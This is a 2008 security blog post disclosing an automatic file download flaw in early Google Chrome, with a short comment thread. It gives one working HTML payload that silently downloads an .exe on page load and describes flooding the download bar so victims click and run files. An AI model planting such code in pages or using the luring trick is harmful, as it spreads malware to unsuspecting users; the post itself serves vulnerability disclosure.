Automatic File Download vulnerabilities in browsers

22:48 13.09.2008

This is English version of my Automatic File Download vulnerabilities in browsers article.

For already known vulnerabilities in browsers I’m adding new one. I present for you new class of vulnerabilities in browsers - Automatic File Download - it’s new attack vector, which can be used for spreading malicious software.

I had occasion to meet before with vulnerabilities, which leaded to automatic downloading of arbitrary files from Internet, particularly exe-files, and with further their execution. It was concerned with buffer overflow vulnerabilities in browsers, Internet Explorer in particular. But for the first time I saw such vulnerability, which is a part of browser’s functionality. This vulnerability was presented in browser Google Chrome. Taking into account that in all other browsers, which I worked with, I didn’t see such vulnerability, so I state that Chrome is a first browser with holed function of file downloading (when attack is going through downloading function).

Variants of attack.

From all vulnerabilities which I have found in Google Chrome, including during my project Day of bugs in Google Chrome, there were seven Automatic File Download. Altogether I disclosed eight such holes: one of nerex and seven of mine.

All these vulnerabilities are triggering automatically - while downloading page with required code. I found 8 such cases in all - via tags iframe, frame, meta, script, body, form, frameset and img. It’s possible to use other tags for this attack, but they will not be triggering automatically, because will require some actions from user (press element, pointing at element, etc.). So for the attack the most suitable are these 8 variants of Automatic File Download vulnerability.

All versions of Google Chrome are vulnerable to these holes (last on current time 0.2.149.29 and previous versions of the browser).

Making of attack.

For making of attack it’s required to place code at web page and attract on it user of the browser.

Example of the code for vulnerability via tag body:

<body onload="document.location='http://websecurity.com.ua/uploads/hack.exe'">

Algorithm of attack:

1. User comes to web site, which contains this code.

Google Chrome-1

2. Executable file (exe) is automatically downloading to user’s computer - into download folder, which is set in options.

Google Chrome-2

After that, user in any time can go to his download folder and during check of his files, run this program. Which can be malicious one.

3. To speed up the attack, offender can stimulate victim to run this application from the browser.

For this mass download effect needs to be used. It’s needed to run for automatic downloading multiple exe-files - which will be showing at bottom of browser’s window (as a buttons). And if run simultaneously many downloadings, they will take whole place at bottom of browser’s window. Which make possibility for user to press on them.

Google Chrome-3

4. User can move cursor and press on one of these buttons. He can do it by accident press button (especially when there will be many of them), from interest, or when decided that he downloaded some file by himself.

Google Chrome-4

5. After pressing on it, user right away runs just downloaded program. Which can hacked his computer. On this picture my demonstration program is shown, which designed for reminding about need to attend to security.

Google Chrome-5

As last picture indicates, even Google can’t protect you from me 8-) .

Conclusion.

Hidden attack (for file downloading) can be made, when user has turned off option “Ask me where to save every file”. Taking into account that this option is turned off by default, and also that even if it turned on, it can be turned off in any time (or by user, or by somebody “kind”, who will have access to user’s browser), so this vulnerability and attacks concerned with it are presenting serious danger.

From browsers which I worked with, such functionality, when it’s possible to set in settings the option “not ask where to save”, is in browser Firefox (from first 0.x versions, one of which I downloaded in 2004). And so, in all versions of Firefox before files downloading always asking, if you want to save this file (as do other browsers). And this option only affect on appearing of new dialog window, where asking where to save the file (i.e. there are two dialogs). But Chrome right away saves file without questions.

For developers of the browsers, particularly Google, it’s better to not allow such vulnerabilities in their applications.


2 відповідей на “Automatic File Download vulnerabilities in browsers”

  1. fdfg каже:

    g :D

  2. MustLive каже:

    Yes, it’s nice hole :-) . But Google fixed it already in Chrome 1.x.

    But already in 2008 I have created File Download attack (which I called SaveAs attack), which could emulate Automatic File Download attack. And it works potentially in all browsers.

Leave a Reply

You must be logged in to post a comment.